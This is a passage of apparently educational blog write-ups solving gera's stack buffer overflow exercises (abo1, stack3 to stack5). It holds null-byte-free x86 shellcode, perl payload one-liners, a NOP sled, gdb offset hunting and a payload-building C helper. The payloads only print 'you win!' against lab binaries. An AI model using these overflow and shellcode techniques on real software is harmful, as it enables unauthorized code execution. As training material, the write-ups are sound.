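#include <string.h>

/* Same arithmetic as getenvaddr.c: shift the address seen in the helper
 * by twice the difference in program-name lengths. */
uint32_t predict_env_addr(uint32_t addr_in_helper,
                          const char *helper_name,
                          const char *target_name) {
    long diff = (long)strlen(helper_name) - (long)strlen(target_name);
    return addr_in_helper + (uint32_t)(diff * 2);
}
```

For example, if the helper were run as ./getenvaddr (12 characters) against a target run as ./abo1 (6 characters), an address of 0xbffff9d5 seen inside the helper would be predicted as 0xbffff9e1 in the target. This is also why the target has to be launched with exactly the name you gave to getenvaddr.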

We can then load our shellcode into an environment variable and overflow the buffer repeatedly with the determined address of the shellcode, which provides us with much win. I hope this was a pretty informative post, and I really hope you all who are following along (all two of you) consider purchasing these books I’m outlining, they are pretty invaluable as a central collection of knowledge. On to the next challenge!

hacking@hacking:~/InsecureProgramming $ cat abo1_shellcode.s
BITS 32             ;  Tell nasm this is 32-bit code.

jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
pop ecx           ; Pop  the return address (string ptr) into ecx.
xor eax, eax      ; Zero  out full 32 bits of eax register.
mov al, 4         ; Write  syscall #4 to the low byte of eax.
xor ebx, ebx      ; Zero out ebx.
inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
xor edx, edx
mov dl, 8        ; Length of the string
int 0x80          ; Do syscall: write(1, string, 8)

; void _exit(int status);
mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
dec ebx          ; Decrement ebx back down to 0 for status = 0.
int 0x80         ; Do syscall: exit(0)

one:
call two   ; Call back upwards to avoid null bytes
db "you win!" ; with no newline or carriage return bytes.
hacking@hacking:~/InsecureProgramming $ nasm -o abo1_shellcode abo1_shellcode.s
hacking@hacking:~/InsecureProgramming $ hexdump -C abo1_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking:~/InsecureProgramming $ export SHELLCODE=$(cat abo1_shellcode)
hacking@hacking:~/InsecureProgramming $ env | grep SHELLCODE
SHELLCODE=? Y1?? 1?C1?? K??????you win!
hacking@hacking:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo1
SHELLCODE will be at 0xbffff9e1
hacking@hacking:~/InsecureProgramming $ ./abo1 $(perl -e 'print "\xe1\xf9\xff\xbf" x 75;')
you win!hacking@hacking:~/InsecureProgramming $

Insecure Programming by Example: shellcode & stack5.c

Introduction

Now it’s time for Insecure Programming by Example exercise stack5.c, and in the interest of brevity I’ll just go ahead and post the damned thing.

/* stack5-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
        int cookie;
        char buf[80];

        printf("buf: %08x cookie: %08x\n", &buf, &cookie);
        gets(buf);

        if (cookie == 0x000d0a00)
                printf("you loose!\n");
}

So, what’s new in this version…oh wait, if we set the cookie correctly, it prints out “you loose!”…so what the heck are we supposed to do now?

The answer lies with shellcode. Basically, we are given a buffer to work with, and we need to put instructions directly in the buffer in the form of raw bytes, and jump execution to a point where our shellcode will run. That’s pretty much it. The concept should be pretty familiar at this point, and as you’ll see the execution is not so hard.

Epic Sploits

It’s worth mentioning that these programs are purposely designed to be exploited, and the techniques we are using are among the most basic when it comes to this sort of thing. Though I have no experience in this line of work professionally, it cannot all be this straightforward. If you want an example of something truly advanced, explained so even I can grasp the basics, I’d go check out Thomas Ptacek’s write-up of Mark Dowd’s Flash NULL pointer exploit. It gives us a glimpse into what the truly advanced techniques look like, and Thomas does an excellent job of explaining not only how it works (generally) but why it’s such a big deal.

So if I act like I know what I’m talking about, just understand that this is a very useful foundation that we are building together, and if you have enjoyed yourself so far, you will not be bored, because there will be plenty of work to do.

Shellc0dage

There are many ways we can attack the problem of developing the shellcode and making it available to the process to be executed. Thanks to the Internet, there are a great many resources where sample shellcode for all sorts of different systems can be referenced or even automatically generated. But in this brief article I’ll take you through the manual generation of shellcode and then the process of getting it to run on the vulnerable program step-by-step. Hacking: The Art of Exploitation’s chapter on shellcode was heavily used as a reference for my original solution (which I can no longer remember), and I’m sure I’ll go back there for more looks in the course of writing this post.

Abstractions of Abstractions

NOTE: This is an area I’m still learning a lot about, if I gloss something over to the point that it’s incorrect or inaccurate, please let me know and I’ll fix it.

So, let’s talk real quick about the difference between instructions, system calls, and C library functions or calls. Essentially, at the lowest level you have x86 assembly instructions, like push, pop, call, mov, and ret. These instructions are hard coded into the logic of the processor, and though the implementation of them in actual transistor logic may change, you generally won’t see the interface to the instruction change at all (for instance, the number or type of arguments it takes). The list of instructions (and of course the registers) that a processor supports is essentially what makes a processor x86-compatible.

NOTE: in the course of doing research for this article, it seems like the system calls and the C library functions are typically both implemented via libc, or in the libc project/package/whatever. The distinction between the two I’m observing here is valid, because they are used two completely different ways, and are even parts of a different set of standards each. I’d think of them as two sides of the same coin, but I’m sure that analogy breaks down as all do at some point.

The next layer up is kernel system calls. System calls are numbered entry points into the kernel that “do stuff” with the given arguments. They are not inherent to the x86 processor; rather, they are inherent to the kernel and operating system that you are using at the time. The code behind them lives in the kernel itself, and what a C program normally calls are thin wrapper functions provided by libc (typically found in /lib). Their purpose (along with the entire kernel, really) is to provide a standardized interface to the hardware of the system. Any time you print something to the screen, type something, use your microphone to record something, or listen to music through your headphones, you are using the standard resources provided by the kernel and the kernel’s system calls to do so. For the curious, we have not yet used system calls directly (only through further-up abstractions such as printf(), which we’ll talk about next) but we will make extensive use of them when we write our shellcode.

The final and highest layer of abstraction we’ll deal with is the C standard library functions, declared in the various header files located typically in /usr/include on your average Linux distribution and implemented in libc. The C standard library is defined through an ISO standard, and each operating system that wants to use C capabilities past what the compiler provides (as an interface to assembly instructions for allocating and managing memory) in a way consistent with other operating systems or kernels needs to implement the standard functions the library defines. Every time you use #include <stdio.h> to call printf(), or #include <string.h> to call strcpy(), you are using functions defined by the ISO standard for C and implemented in libc, which is mapped into the memory of every process that links against it.
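
To make the layering a bit more concrete, here is a minimal sketch that asks for the same thing two ways: once by system call number, and once through libc's wrapper. It assumes Linux with glibc, whose syscall() function and SYS_write constant are what I'm leaning on here; the function names raw_write and wrapped_write are made up for illustration.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE       /* assumption: glibc, needed to expose syscall() */
#endif
#include <assert.h>
#include <string.h>
#include <sys/syscall.h>  /* SYS_write */
#include <unistd.h>       /* syscall(), write() */

/* Ask the kernel by system call number, bypassing the write() wrapper. */
long raw_write(int fd, const char *s)
{
    assert(s != NULL);
    return syscall(SYS_write, fd, s, strlen(s));
}

/* The same request through libc's thin wrapper around the system call. */
long wrapped_write(int fd, const char *s)
{
    assert(s != NULL);
    return (long)write(fd, s, strlen(s));
}
```

Both calls return the number of bytes written, so raw_write(1, "you win!\n") and wrapped_write(1, "you win!\n") should each print the string and return 9. printf() sits one layer above both of these and adds formatting and buffering.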

Oh boy, this section sure does gloss over quite a bit that might be worth mentioning. I’m sure it will come up at some point later on, in the meantime if you want to do some extracurricular reading, I would say a great reference, perhaps the only one you’ll ever need, is Advanced Programming in the UNIX Environment by W. Richard Stevens and Stephen Rago, it’s a bit above my head but it will serve you well if you ever need to look something up…ever.  If you want a more gentle introduction that is very outdated but still quite informative and fun to read, I’d recommend The UNIX Programming Environment by Brian Kernighan and Rob Pike, I read this book and really liked it.

Enough Edumacation, Let’s Break Shit

Now I’m going to briefly outline how to build the shellcode we’re going to use, and then again briefly talk about some quick optimizations you can do to get rid of null bytes and wasted space in the shellcode. Null bytes are not a problem for the gets() function, but if you are using something like strcpy() in the future, or anything else that treats a null byte as the end of a string, the first null byte in your shellcode will stop the copy before the rest of it makes it into memory.

We are going to use the write() system call for Linux to actually print out our string. I guess that there are others that are available to print output to a file descriptor (STDOUT in our case), and I was hoping to find where printf() or puts() from the C standard library directly referenced the write() system call to satisfy personal curiosity, but couldn’t.

Assembly code can be written using mnemonics, which are English-like names that correspond directly to the numeric opcodes (one or more bytes each) that make up the actual machine language the processor understands. Whenever we use push or something like it with an argument after it, or whenever we see it in the output of objdump -D or another disassembler, we need to remember that it’s just another abstraction. The job of turning mnemonic instructions into actual machine language is that of the assembler. The assembler we’re going to use is a fairly standard and free one called the Netwide Assembler (nasm).

section .data  ; data segment
msg   db "you win!", 0x0a, 0x0d ; the string to print with newline at the end

section .text  ; text segment, where the code is
global _start  ; default entry point for ELF linking

_start:
; SYSCALL: ssize_t write(int fd, const void *buf, size_t count);
; Our syscall: write(1, msg, 10)
mov eax, 4  ; put 4 into EAX register, syscall write is #4 (/usr/include/asm-i386/unistd.h)
mov ebx, 1  ; put 1 into EBX, since file descriptor we want is STDOUT
mov ecx, msg   ; Put the address of the string into ECX, since it's what we want to print
mov edx, 10 ; put 10 into EDX, since string is 10 bytes (with crlf at the end)
int 0x80 ; tell the kernel to do a syscall

; SYSCALL: void _exit(int status);
; Our syscall: exit(0) meaning that there were no problems
mov eax, 1  ; put 1 into EAX since exit() is syscall #1
mov ebx, 0  ; put 0 into EBX, since that's our one and only argument to exit()
int 0x80 ; tell the kernel to do a syscall

The above code is an example of how one might write a program in assembly to print out “you win!”. The code is commented, and the comments explain each step. If we wanted to assemble this code into a proper ELF binary for Linux, we’d have to assemble the code into an object file with nasm, and then link the executable by running the ld command.

hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.asm
printyouwin.asm: ASCII English text
hacking@hacking-theart:~/InsecureProgramming $ nasm -f elf printyouwin.asm
hacking@hacking-theart:~/InsecureProgramming $ ls -la printyouwin.*
-rwxr--r-- 1 hacking hacking 651 2009-12-12 11:08 printyouwin.asm
-rw-r--r-- 1 hacking hacking 544 2009-12-12 11:09 printyouwin.o
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.o
printyouwin.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ld -o printyouwin printyouwin.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048060
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin
printyouwin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
hacking@hacking-theart:~/InsecureProgramming $ ./printyouwin
you win!

This is all well and good, however since we are using our shellcode within another already-started process, we won’t have the ability to reference the memory in the various sections of the executable to retrieve static values such as the string “you win!” which will be passed as an argument to the write() call. Since we know the other integer values for the 2 remaining arguments to write(), and can provide them directly, that is not such an issue because we can populate those registers with a mov instruction. But we need a way to get the string value we want to print into the ECX register, so write() will print it out for us. Enter the stack.

BITS 32             ;  Tell nasm this is 32-bit code.

  call mark_below   ;  Call below the string to instructions
  db "you win!",  0x0a, 0x0d  ; with newline and carriage return bytes.

mark_below:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  mov eax, 4        ; Write  syscall #.
  mov ebx, 1        ; STDOUT  file descriptor
  mov edx, 10       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 10)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall:  exit(0)

This code uses a trick of the call instruction: call pushes the address of whatever immediately follows it onto the stack (normally the next instruction, here our string), and the first thing we do after the call is pop that address back off of the stack into the ECX register. That address is then used as a pointer to the string that we want to print.

We’ll want to translate this code not to the ELF format, but to raw machine instructions, since we want to inject this code into a running process. To do this, we’ll use nasm without any arguments concerning the format parameter, then I’ll show you how many bytes the assembled shellcode takes up, and what it looks like when disassembled. Remember that, since we only have control of the 80 byte buffer we only really have that many bytes to work with, give or take a few, so our shellcode cannot be too bloated.

hacking@hacking-theart:~/InsecureProgramming $ nasm -o printyouwin1 printyouwin1.asm
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin1*
printyouwin1:     data
printyouwin1.asm: ASCII English text
printyouwin1.o:   ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ls -l printyouwin1
-rw-r--r-- 1 hacking hacking 45 2009-12-12 11:57 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ wc -c printyouwin1
45 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C printyouwin1
00000000  e8 0a 00 00 00 79 6f 75  20 77 69 6e 21 0a 0d 59  |.....you win!..Y|
00000010  b8 04 00 00 00 bb 01 00  00 00 ba 0a 00 00 00 cd  |................|
00000020  80 b8 01 00 00 00 bb 00  00 00 00 cd 80           |.............|
0000002d
hacking@hacking-theart:~/InsecureProgramming $ objdump -D printyouwin1
objdump: printyouwin1: File format not recognized
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 printyouwin1
00000000  E80A000000        call 0xf
00000005  796F              jns 0x76
00000007  7520              jnz 0x29
00000009  7769              ja 0x74
0000000B  6E                outsb
0000000C  210A              and [edx],ecx
0000000E  0D59B80400        or eax,0x4b859
00000013  0000              add [eax],al
00000015  BB01000000        mov ebx,0x1
0000001A  BA0A000000        mov edx,0xa
0000001F  CD80              int 0x80
00000021  B801000000        mov eax,0x1
00000026  BB00000000        mov ebx,0x0
0000002B  CD80              int 0x80

This shellcode, while awesome, is not foolproof for many scenarios. If we are using the gets() function, we cannot include newlines in our printed string, because they will prematurely terminate the gets() function. If we are using other typical string-based functions such as strcpy(), the null bytes will kill us by prematurely terminating those functions as well. Here is a slimmed down version of the shellcode that uses several techniques: writing to the one-byte low halves of registers (al, dl) instead of the full 32 bits, XORing registers against themselves to zero out 32-bit registers prior to instruction execution, smaller instructions such as jmp short to eliminate further null bytes, and calling back up into memory so that the relative offset is a negative (two’s complement) number made of 0xff bytes rather than nulls. It also eliminates the 0x0a and 0x0d newline and carriage return bytes, as the newline would kill the gets() function prematurely.

BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 8         ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 8)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "you win!"  ; with no newline or carriage return bytes.
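
A quick way to check a candidate for the problem bytes discussed above is to scan it before sending it anywhere. This is only a sketch: the function and array names are mine, the first array is copied from the printyouwin1 hexdump earlier in the post, and the second holds the bytes this slimmed-down listing assembles to (they match the hexdump of stack5shellcode.out further down). The "bad" set here is null plus newline, on the assumption that we care about both strcpy() and gets().

```c
#include <assert.h>
#include <stddef.h>

/* Bytes from the hexdump of the first attempt (printyouwin1, 45 bytes). */
static const unsigned char first_attempt[] = {
    0xe8, 0x0a, 0x00, 0x00, 0x00, 0x79, 0x6f, 0x75, 0x20, 0x77, 0x69, 0x6e,
    0x21, 0x0a, 0x0d, 0x59, 0xb8, 0x04, 0x00, 0x00, 0x00, 0xbb, 0x01, 0x00,
    0x00, 0x00, 0xba, 0x0a, 0x00, 0x00, 0x00, 0xcd, 0x80, 0xb8, 0x01, 0x00,
    0x00, 0x00, 0xbb, 0x00, 0x00, 0x00, 0x00, 0xcd, 0x80
};

/* Bytes of the slimmed-down version (34 bytes). */
static const unsigned char slimmed[] = {
    0xeb, 0x13, 0x59, 0x31, 0xc0, 0xb0, 0x04, 0x31, 0xdb, 0x43, 0x31, 0xd2,
    0xb2, 0x08, 0xcd, 0x80, 0xb0, 0x01, 0x4b, 0xcd, 0x80, 0xe8, 0xe8, 0xff,
    0xff, 0xff, 0x79, 0x6f, 0x75, 0x20, 0x77, 0x69, 0x6e, 0x21
};

/* Assumed bad set: 0x00 stops strcpy(), 0x0a stops gets(). */
static const unsigned char bad_bytes[] = { 0x00, 0x0a };

/* Return the index of the first byte of buf that appears in bad,
 * or -1 if the buffer is clean. */
long first_bad_byte(const unsigned char *buf, size_t len,
                    const unsigned char *bad, size_t nbad)
{
    assert(buf != NULL && bad != NULL);
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (long)i;
    return -1;
}
```

Run against first_attempt this reports index 1 (the 0x0a inside the call offset), while slimmed comes back as -1, which is what we want before feeding it to gets().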

And here is us, assembling the code and then putting it into the buffer, prefixed with a NOP sled to be executed successfully! You win!

hacking@hacking-theart:~/InsecureProgramming $ nasm -o stack5shellcode.out stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ md5sum stack5shellcode*
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode
0f2668754e312f90cef8dff7f6c90723  stack5shellcode.bytes
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode.out
bd6be6a87c2eee6e0fab27f13ba5853d  stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 stack5shellcode.out
00000000  EB13              jmp short 0x15
00000002  59                pop ecx
00000003  31C0              xor eax,eax
00000005  B004              mov al,0x4
00000007  31DB              xor ebx,ebx
00000009  43                inc ebx
0000000A  31D2              xor edx,edx
0000000C  B208              mov dl,0x8
0000000E  CD80              int 0x80
00000010  B001              mov al,0x1
00000012  4B                dec ebx
00000013  CD80              int 0x80
00000015  E8E8FFFFFF        call 0x2
0000001A  796F              jns 0x8b
0000001C  7520              jnz 0x3e
0000001E  7769              ja 0x89
00000020  6E                outsb
00000021  21                db 0x21
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C stack5shellcode.out
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking-theart:~/InsecureProgramming $ perl -e 'print "\x90" x 74 . "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "\xb0\xf7\xff\xbf\n";' | ./stack5
buf: bffff7b0 cookie: bffff80c
you win!hacking@hacking-theart:~/InsecureProgramming $ 

I wanted to make sure that a NOP sled was an understood concept, but really we could have just as easily put the shellcode at the very beginning of the buffer, padded the rest with junk, and executed all the same.

root@hacking-theart:/home/hacking/InsecureProgramming # perl -e 'print "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "A" x 74 . "\x80\xf7\xff\xbf\n";' | ./stack5
buf: bffff780 cookie: bffff7dc
you win!root@hacking-theart:/home/hacking/InsecureProgramming #
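
If the perl one-liners are hard to read, the layout of the first payload can be sketched in C as below. This is an illustration only: build_payload is a made-up name, the 0x90 sled byte and the little-endian return address are taken from the commands above, and the trailing newline that perl appends to end the gets() call is left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Lay out [NOP sled][shellcode][return address] into out.
 * Returns the number of bytes written, or 0 if out is too small. */
size_t build_payload(unsigned char *out, size_t cap,
                     size_t sled_len,
                     const unsigned char *code, size_t code_len,
                     uint32_t ret_addr)
{
    assert(out != NULL && code != NULL);

    size_t total = sled_len + code_len + 4;
    if (total > cap)
        return 0;

    memset(out, 0x90, sled_len);             /* NOP sled */
    memcpy(out + sled_len, code, code_len);  /* shellcode after the sled */

    /* x86 is little-endian, so the low byte of the address goes first. */
    unsigned char *ret = out + sled_len + code_len;
    ret[0] = (unsigned char)(ret_addr & 0xff);
    ret[1] = (unsigned char)((ret_addr >> 8) & 0xff);
    ret[2] = (unsigned char)((ret_addr >> 16) & 0xff);
    ret[3] = (unsigned char)((ret_addr >> 24) & 0xff);

    return total;
}
```

With a 74-byte sled, the 34-byte shellcode and 0xbffff7b0 as the return address, this produces 112 bytes ending in b0 f7 ff bf, the same shape as the first command. The second command just swaps the order: shellcode first, then 74 bytes of filler.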

And that (finally) wraps us up for the stackN.c series of stack buffer overflows designed and provided for free by gera of Core. I’ll probably never, ever write about these again, it was pretty laborious, but I hope you didn’t find reading about it so. I used very many references through completing these write-ups, and I recommend them all, but if you can’t afford to go out and buy $500.00 worth of new books, you might want to check out the Safari Books Online site that O’Reilly offers, as it’s a pretty good deal (though less so now that they eliminated the 5-book shelf :-(). The Internet and Google (and Bing!) are your friends as well. Go forth, and break things!

Insecure Programming by Example – controlling EIP, stack4.c

Note: I couldn’t get this exploit to work on Debian 5; I think there must be some overflow protection or something I was working against on top of the ASLR I had already disabled. So I moved to the Hacking: The Art of Exploitation LiveCD, but any much older Linux should work for you (think Red Hat 7).

Ok, so everyone, before reading this one, repeat after me:

The goal is to control execution. The goal is to win. It doesn’t matter how you control things, or how you win, just win. Control is everything.

That may sound a little melodramatic, but I remember having a really hard time with stack4.c, not because the concepts were hard to grasp, but because I kept trying to control execution of the program the way I had in the previous three challenges, instead of just winning any way I could. That to me is the fundamental thing this challenge is attempting to teach the student. This particular challenge is not really about controlling EIP (though you will learn how to do that), rather, it’s about changing the way you think about computer programs in general. The point being that they do not always do what we think we told them to do, they do exactly what we told them to do ;-).

If you want to read a quick’n’dirty description of the right mindset for this sort of thing, along with some ideas on how to proceed if you want to be good at being bad, I highly recommend @kmx2600’s article on the VRT blog, “How do I become a ninja?”. Indeed, those are the steps that I’m now following to better myself in this arena, and I’m the one that asked his team the question in the first place, so it’s only appropriate I should share my progress so others might get bitten by the bug as well.

On to the bug!

/* stack4-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x000d0a00)
		printf("you win!\n");
}

So…this may be tricky. Can anyone see why? See, they want us to make the cookie value equal to 0x000d0a00…can anyone spot the problem with this, alluded to in a previous post? That’s right, we can’t set the cookie variable to the appropriate value via the gets() function, because gets() terminates on a newline character, otherwise known as 0x0A. So we are going to need to find a way to win without setting the value of the cookie variable directly.

How else could we win? Think back to the beginning of this post: the object of the game is to take control of execution any way we’d like to. We want the program to print out “you win!”. If we look at this program in a debugger, from the assembly language perspective, a way to do this might become clear.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./stack4
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483b4 <main+0>:    push   ebp
0x080483b5 <main+1>:    mov    ebp,esp
0x080483b7 <main+3>:    sub    esp,0x78
0x080483ba <main+6>:    and    esp,0xfffffff0
0x080483bd <main+9>:    mov    eax,0x0
0x080483c2 <main+14>:   sub    esp,eax
0x080483c4 <main+16>:   lea    eax,[ebp-12]
0x080483c7 <main+19>:   mov    DWORD PTR [esp+8],eax
0x080483cb <main+23>:   lea    eax,[ebp-104]
0x080483ce <main+26>:   mov    DWORD PTR [esp+4],eax
0x080483d2 <main+30>:   mov    DWORD PTR [esp],0x80484d4
0x080483d9 <main+37>:   call   0x80482d4 <printf@plt>
0x080483de <main+42>:   lea    eax,[ebp-104]
0x080483e1 <main+45>:   mov    DWORD PTR [esp],eax
0x080483e4 <main+48>:   call   0x80482b4 <gets@plt>
0x080483e9 <main+53>:   cmp    DWORD PTR [ebp-12],0xd0a00
0x080483f0 <main+60>:   jne    0x80483fe <main+74>
0x080483f2 <main+62>:   mov    DWORD PTR [esp],0x80484ec
0x080483f9 <main+69>:   call   0x80482d4 <printf@plt>
0x080483fe <main+74>:   leave
0x080483ff <main+75>:   ret
End of assembler dump.

This is where some very basic knowledge of x86 assembly language will pay off (and I mean very basic, as I am certainly no expert). The section of the listing above from main+42 through main+69 is essentially equal to the C code:

gets(buf);

if (cookie == 0x000d0a00)
	printf("you win!\n");

I’ll leave it to the reader to read some intros on x86 assembly programming, or better yet, to read the excellent “Programming from the Ground Up” by Jonathan Bartlett, but it should be plain from the listing above what is occurring. Here is a summary with the details glossed over a bit.

First, we call the gets() function to get our input with call 0x80482b4. Then the cmp instruction compares the 4-byte (DWORD) value stored 12 bytes below the frame base (ebp-12), which is our cookie variable, with the hex value 0xd0a00. The result of that comparison is recorded in the EFLAGS register (another important thing to understand), and the if statement is then implemented using the jne instruction, which stands for “jump if not equal”. If the comparison was not equal, it jumps execution past the printf() call that is set up starting at 0x080483f2, which would print out our “you win!” statement. That’s how the if/then construct in C ends up looking in assembly.

The important thing to take away here is that if we want to print out “you win!”, we simply need to get the instructions at 0x080483f2 to be executed. The easiest way to do that is to get EIP to point there, and the easiest way to do that is to overwrite the saved EIP (the return address) that was placed on the stack when main() was called. Essentially, any time a function is called, such as gets(), printf(), or even main() (which is what we are counting on here), the return address, which is the address execution moves to once the function finishes, is pushed onto the stack, and the function’s local variables end up on the stack just below it. That means that if the program flow allows us to reach the point where the function returns, and we can write an arbitrary amount of data to the stack with a bad function such as gets(), we can pretty much do whatever we want!

The game plan is to figure out where the return address is stored during the execution of the main() call, determine its distance from the buf variable, and figure out if we can overwrite it with the value 0x080483f2…if we can do this, we win. Let’s explore the state of the program at the time gets() is called using our debugger. Specifically, we want to see the state of the stack, and the best way to do this is to examine stack frames with the backtrace and info frame commands. A few of the commands used below are new ones you’ll want to have in your back pocket in the future.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./stack4
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) break gets
Function "gets" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (gets) pending.
(gdb) run
Starting program: /home/hacking/InsecureProgramming/stack4
Breakpoint 2 at 0xb7ef21c6
Pending breakpoint "gets" resolved
buf: bffff770 cookie: bffff7cc

Breakpoint 2, 0xb7ef21c6 in gets () from /lib/tls/i686/cmov/libc.so.6
(gdb) backtrace
#0  0xb7ef21c6 in gets () from /lib/tls/i686/cmov/libc.so.6
#1  0x080483e9 in main () at stack4.c:11
(gdb) info frame 0
Stack frame at 0xbffff760:
 eip = 0xb7ef21c6 in gets; saved eip 0x80483e9
 called by frame at 0xbffff7e0
 Arglist at 0xbffff758, args:
 Locals at 0xbffff758, Previous frame's sp is 0xbffff760
 Saved registers:
  ebp at 0xbffff758, eip at 0xbffff75c
(gdb) info frame 1
Stack frame at 0xbffff7e0:
 eip = 0x80483e9 in main (stack4.c:11); saved eip 0xb7eafebc
 caller of frame at 0xbffff760
 source language c.
 Arglist at 0xbffff7d8, args:
 Locals at 0xbffff7d8, Previous frame's sp is 0xbffff7e0
 Saved registers:
  ebp at 0xbffff7d8, eip at 0xbffff7dc
(gdb) print 0xbffff7dc - 0xbffff770
$1 = 108
(gdb) next
Single stepping until exit from function gets,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
main () at stack4.c:13
13              if (cookie == 0x000d0a00)
(gdb) x 0xbffff7dc
0xbffff7dc:     0x42424242

What we’re seeing here is that the stored EIP for the main() stack frame is 108 bytes from the buf variable’s start position. In essence, each memory address refers to a single byte of storage, so by calculating the difference between two addresses we know exactly how many bytes we must send to reach the stored EIP in the stack. Since a single ASCII-encoded character is exactly one byte long, I went ahead and sent 108 “A” characters with 4 “B” characters tacked onto the end to overwrite the stored EIP, and examining that memory address directly shows that it worked (0x42 is “B”).

So, let’s try our exploit now, knowing that 108 bytes is our offset for the variables. The code will fully execute; it will just jump back up the execution path on attempting to exit the first time and print out the “you win!” message, and then it will exit gracefully as if nothing had happened. Or at least, that’s the idea.

hacking@hacking-theart:~ $ perl -e 'print "A" x 108 . "\xf2\x83\x04\x08\n";' | ~/InsecureProgramming/stack4
buf: bffff790 cookie: bffff7ec
you win!
Segmentation fault

Ok, so, that worked! We still need to figure out why it segfaulted, and also why I couldn’t do this on the Debian 5 machine, but I’ll leave those subjects for future articles. Thanks for reading, hope you learned something.

Insecure Programming by Example – ruminations on stack3.c

So, last things first on this one, let’s get the solution out of the way, and then we can talk about why exactly this challenge was so easy, and how it could be written to teach something. I’m not sure, but I think this one may have been an oversight on gera’s part…either way, let’s talk it through and hopefully teach something along the way.

Here is Insecure Programming by Example stack3.c:

/* stack3-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x01020005)
  		printf("you win!\n");
}

And here is the solution:

debian5:/home/mishley/InsecureProgramming# gcc -ggdb -o stack3 stack3.c 
/tmp/cci2jW0e.o: In function `main':
/home/mishley/InsecureProgramming/stack3.c:11: warning: the `gets' function is dangerous and should not be used.
debian5:/home/mishley/InsecureProgramming# perl -e 'print "A" x 80 . "\x05\x00\x02\x01" . "\n";' | ./stack3 
buf: bffffa00 cookie: bffffa50
you win!
Segmentation fault

